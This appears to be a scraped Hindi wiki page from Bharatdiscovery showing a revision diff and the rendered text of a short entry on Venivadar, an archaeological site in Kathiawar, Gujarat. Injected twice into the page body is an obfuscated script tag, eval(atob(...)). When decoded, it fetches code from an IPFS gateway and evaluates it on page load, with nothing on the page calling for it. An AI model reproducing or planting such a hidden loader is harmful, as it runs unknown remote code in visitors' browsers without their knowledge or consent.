Difference between revisions of "वेनीवडार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''वेनीवडार''' काठियावाड़, गुजरात का ऐतिहासिक स्थान...' के साथ नया पन्ना बनाया)
 
m (Text replacement - " द्धारा " to " द्वारा ")
 
Line 1: Line 1:
 
'''वेनीवडार''' [[काठियावाड़]], [[गुजरात]] का ऐतिहासिक स्थान है।
 
'''वेनीवडार''' [[काठियावाड़]], [[गुजरात]] का ऐतिहासिक स्थान है।
  
*इस स्थान पर [[उत्खनन]] द्धारा उनेक [[प्रागैतिहासिक काल]] के [[अवशेष]] प्राप्त हुए हैं।
+
*इस स्थान पर [[उत्खनन]] द्वारा उनेक [[प्रागैतिहासिक काल]] के [[अवशेष]] प्राप्त हुए हैं।
 
*पुरातत्व के विद्धानों का मत है कि ये अवशेष अणुपाषाण तथा पूर्व-पाषाण युग की उस सभ्यता से संबंधित हैं, जिसका मूल स्थान [[बेबीलोन|बेबीलोनिया]] में था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=876|url=}}</ref>
 
*पुरातत्व के विद्धानों का मत है कि ये अवशेष अणुपाषाण तथा पूर्व-पाषाण युग की उस सभ्यता से संबंधित हैं, जिसका मूल स्थान [[बेबीलोन|बेबीलोनिया]] में था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=876|url=}}</ref>
  

Latest revision as of 10:22, 13 October 2017

venivadar kathiyava d, gujarat ka aitihasik sthan hai.

  • is sthan par utkhanan dvara unek pragaitihasik kal ke avashesh prapt hue haian.
  • puratatv ke viddhanoan ka mat hai ki ye avashesh anupashan tatha poorv-pashan yug ki us sabhyata se sanbandhit haian, jisaka mool sthan bebiloniya mean tha.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharatakosh pustakalay |prishth sankhya: 876 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>